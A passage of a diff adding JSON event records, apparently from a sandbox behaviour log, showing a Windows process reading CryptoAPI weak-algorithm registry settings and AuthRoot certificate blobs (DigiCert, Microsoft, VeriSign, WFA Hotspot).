+ { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 432, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakMD5AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 433, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakMD5ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 434, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakMD5AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 435, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakMD5ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 436, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakMD5AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 437, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1ThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 438, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1ThirdPartyFlags", + "content": "18446744071562330112" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 439, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1ThirdPartyAfterTime", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 440, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 441, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakSHA1AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 442, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 443, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakSHA1AllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 444, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 445, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakSHA1AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 446, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 447, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakSHA1AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 448, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakSHA1ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 449, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\WeakSHA1AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 450, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakSHA1ThirdPartySha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 451, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\CI\\Config\\Default\\WeakSHA1AllSha256Allow", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 452, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakRSAThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 453, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakRSAThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 454, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakRSAAllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 455, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakRSAAllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 456, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakDSAThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 457, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakDSAThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 458, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakDSAAllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 459, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakDSAAllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 460, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakECDSAThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 461, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakECDSAThirdPartyFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 462, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\WeakECDSAAllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 463, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\Default\\WeakECDSAAllFlags", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 464, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 465, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00t\\x99f\\xce\\xcc\\x95\\xc1\\x87A\\x94\\xcar\\x03\\xf9\\xb6 \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x05c\\xb8c\rb\\xd7Z\\xbb\\xc8\\xab\\x1eK\\xdf\\xb5\\xa8\\x99\\xb2MC\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O_\\x10i09\\x8d\t\\x10{@\\xc3\\xc7\\xca\\x8f\\x1c\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x12\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00E\\xeb\\xa2\\xaf\\xf4\\x92\\xcb\\x821-Q\\x8b\\xa7\\xa7!\\x9d\\xf3m\\xc8\\x0fb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00>\\x90\\x99\\xb5\\x01^\\x8fHl\\x00\\xbc\\xea\\x9d\\x11\\x1e\\xe7!\\xfa\\xba5Z\\x89\\xbc\\xf1\\xdfiV\\x1e=\\xc62\\\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00m\\xca[\\xd0\r\\xcf\\x1c\\x0f2pY\\xd3t\\xb2\\x9c\\xa6\\xe3\\xc5\n\\xa6 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xbb\\x03\\x00\\x000\\x82\\x03\\xb70\\x82\\x02\\x9f\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xe7\\xe0\\xe5\\x17\\xd8F\\xfe\\x8f\\xe5`\\xfc\\x1b\\xf0090\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x150\\x13\\x06\\x03U\\x04\n\\x13\\x0cDigiCert Inc1\\x190\\x17\\x06\\x03U\\x04\\x0b\\x13\\x10www.digicert.com1$0\"\\x06\\x03U\\x04\\x03\\x13\\x1bDigiCert Ass" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 466, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 467, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\51501FBFCE69189D609CFAF140C576755DCC1FDF\\Blob", + "content": "\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x000\\x1e\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xeb\\x15w\\xb4\\x0b<\\x8b\\xab\\xae4m\\xd9\\x8e\\xad\\x07\\x80\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00QP\\x1f\\xbf\\xcei\\x18\\x9d`\\x9c\\xfa\\xf1@\\xc5vu]\\xcc\\x1f\\xdf\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00[\\xcb\\x93\\xea\\xdb}mO\\xb7\\xa0\n/:\\xe5\\x03\\x0c\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00g\\x0eI,a\\x17\\x9e\\xeb\\xed\\xe0T\\xe7\\x84\\xd9\\x9b\\xadd`seb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xa3\\xcchY]\\xfe~\\x86\\xd8\\xad\\x17r\\xa8\\xb5(J\\xddT\\xac\\xe3\\xb8\\xa7\\x98\\xdfG\\xbc\\xca\\xfb\\x1f\\xdb\\x84\\xdf\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00>\\x00\\x00\\x00H\\x00o\\x00t\\x00s\\x00p\\x00o\\x00t\\x00 \\x002\\x00.\\x000\\x00 \\x00T\\x00r\\x00u\\x00s\\x00t\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x000\\x003\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xbeR\\xe4a\\xb1}\\xd6%'q%\\x1bE\\xe9\\x8f\\x122\\xca\\xa1%\\x12\\xdcy\\x11\\x8d\\x0c_\\xces\\xa5M\\x95\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00O\\xcb\\x14\\xf7\\xc4\\xa3\\x8f/&\\\\x1f\\x12\\xc9\\xafVwY\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x00R\\x00S\\x00A\\x00/\\x00S\\x00H\\x00A\\x002\\x005\\x006\\x00\\x00\\x00 \\x00\\x00\\x00\\x01\\x00\\x00\\x00p\\x05\\x00\\x000\\x82\\x05l0\\x82\\x03T\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x0c\\xb3\\x0fp\\xf2\\x86\\xa43\\xe0\\xb9\t\\x89\\xde\\x01\\xed\\xb70\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0b\\x05\\x000P1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x180\\x16\\x06\\x03U\\x04\n\\x13\\x0fWFA Hotspot 2.01'0%\\x06\\x03U\\x04\\x03" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 468, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 469, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\73A5E64A3BFF8316FF0EDCCC618A906E4EAE4D74\\Blob", + "content": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x9ds\\x93y;\\xca2@1u\\xdc\\x12~\\x0e\\xc1\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00s\\xa5\\xe6J;\\xff\\x83\\x16\\xff\\x0e\\xdc\\xcca\\x8a\\x90nN\\xaeMti\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x03\\x01\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00r\\xa4\\x91\\x950\\x9f\\xb94\\xd6\n\\x98\\xe4\\xecE\\x1al\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\t\\xcbY\\x7f\\x86\\xb2p\\x8f\\x1a\\xc39\\xe3\\xc0\\xd9\\xe9\\xbf\\xbbM\\xb2#\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x16\\x00\\x00\\x000\\x14\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xc7A\\xf7\\x0fK*\\x8d\\x88\\xbf.q\\xc1A\"\\xefS\\xef\\x10\\xeb\\xa0\\xcf\\xa5\\xe6L\\xfa \\xf4\\x18\\x850s\\xe0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00R\\x00S\\x00A\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00e\\x00r\\x00t\\x00i\\x00f\\x00i\\x00c\\x00a\\x00t\\x00e\\x00 \\x00A\\x00u\\x00t\\x00h\\x00o\\x00r\\x00i\\x00t\\x00y\\x00 \\x002\\x000\\x001\\x007\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00A3\\xc4\\xe6\\x0f\\xa1\\x83\\xee^zD\\x16\\xc5\\xd5L3\\x92\\xc5l/W()\\xbfY4tg\\xba\\xb0{\\xcd\\xcf\\x84\\x01b\\x98\\x83A\\xd2\\xd2\\x84\\xfb\\xd8V\\xdfS\\xb1 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xac\\x05\\x00\\x000\\x82\\x05\\xa80\\x82\\x03\\x90\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x1e\\xd3\\x97\t_\\xd8\\xb4\\xb3Gp\\x1e\\xaa\\xbe\\x7fE\\xb30\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x0c\\x05\\x000e1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x1e0\\x1c\\x06\\x03U\\x04\n\\x13\\x15Microsoft Corporation1604\\x06\\x03U\\x04\\x03\\x13-Microsof" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 470, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 471, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\742C3192E607E424EB4549542BE1BBC53E6174E2\\Blob", + "content": "h\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00=\\xb6[\\xd9\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x00\\x000\\x0c\\x06\n+\\x06\\x01\\x04\\x01\\x827^\\x01\\x02S\\x00\\x00\\x00\\x01\\x00\\x00\\x00$\\x00\\x00\\x000\"0 \\x06\n+\\x06\\x01\\x04\\x01\\x827^\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd7\\xc6;\\xe0\\x83}\\xba\\xbf\\x88\\x1dO\\xbf_\\x98j\\xd8\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\xfcc]\\xf6&>\r\\xf3%\\xbe_y\\xcdgg\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00F\\x00\\x00\\x00V\\x00e\\x00r\\x00i\\x00S\\x00i\\x00g\\x00n\\x00 \\x00C\\x00l\\x00a\\x00s\\x00s\\x00 \\x003\\x00 \\x00P\\x00u\\x00b\\x00l\\x00i\\x00c\\x00 \\x00P\\x00r\\x00i\\x00m\\x00a\\x00r\\x00y\\x00 \\x00C\\x00A\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xe2\\x7f{\\xd8w\\xd5\\xdf\\x9e\n?\\x9e\\xb4\\xcb\\x0e.\\xa9\\xef\\xdbiw\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00'\\xb3Qvg3\\x1c\\xe2\\xc1\\xe7@\\x02\\xb5\\xff\"\\x98\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00t,1\\x92\\xe6\\x07\\xe4$\\xebEIT+\\xe1\\xbb\\xc5>at\\xe2\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00*\\x00\\x00\\x000(\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xe7hV4\\xef\\xac\\xf6\\x9a\\xce\\x93\\x9ak%[{O\\xab\\xefB\\x93[P\\xa2e\\xac\\xb5\\xcb`'\\xe4Np~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x10\\xc5\\x1e\\x92\\xd2\\x01 \\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x02\\x00\\x000\\x82\\x02<0\\x82\\x01\\xa5\\x02\\x10p\\xba\\xe4\\x1d\\x10\\xd9)4\\xb68\\xca{\\x03\\xcc\\xba\\xbf0\r\\x06\t" + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 472, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob", + "content": null + } + }, + { + "event": "read", + "object": "registry", + "timestamp": "2025-03-07 21:41:29,734", + "eid": 473, + "data": { + "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\7E04DE896A3E666D00E687D33FFAD93BE83D349E\\Blob", + "content": "\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xb0\t\\xe9\\x9a\\\\xfc\\x92\\x8a\\x171\\x90\\x10m\\xbb2\\xa9\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00~\\x04\\xde\\x89j>fm\\x00\\xe6\\x87\\xd3?\\xfa\\xd9;\\xe8=4\\x9e\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xd0\\xab9\\xed\\xd1\\xa4\\xd8\\x9aU\\x12\\x88-\\xeb\t\\xcb\\x13\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb3\\xdbH\\xa4\\xf9\\xa1\\xc5\\xd8\\xae6A\\xcc\\x11cib)\\xbcK\\xc6b\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x001\\xadfH\\xf8\\x10A8\\xc78\\xf3\\x9e\\xa42\\x0139>:\\x18\\xcc\\x02)n\\xf9|*\\xc9\\xefg1\\xd0\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00D\\x00i\\x00g\\x00i\\x00C\\x00e\\x00r\\x00t\\x00 \\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00G\\x003\\x00\\x00\\x00\t\\x00\\x00\\x00\\x01\\x00\\x00\\x004\\x00\\x00\\x0002\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00\\x82\\xc8\\x01\\x999w\"\\xb5z\\xd4s\\xea&k\\x93\\xd4\\x7f\\xfcw\\xfe\\x07\\xf0\\x93\\x884_ \\xda\\xb6\\xad\\xdd\\x08vr\\xf9\\x88\\xb4\\xbb\\xfd\\x15LK\\x130\\x1f\\x06\t`\\x86H\\x01\\x86\\xfdl\\x02\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\\\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x0f:\\x05'\\xd2B\\xde-\\xc9\\x8e\\\\xfc\\xb1\\xe9\\x91\\xee 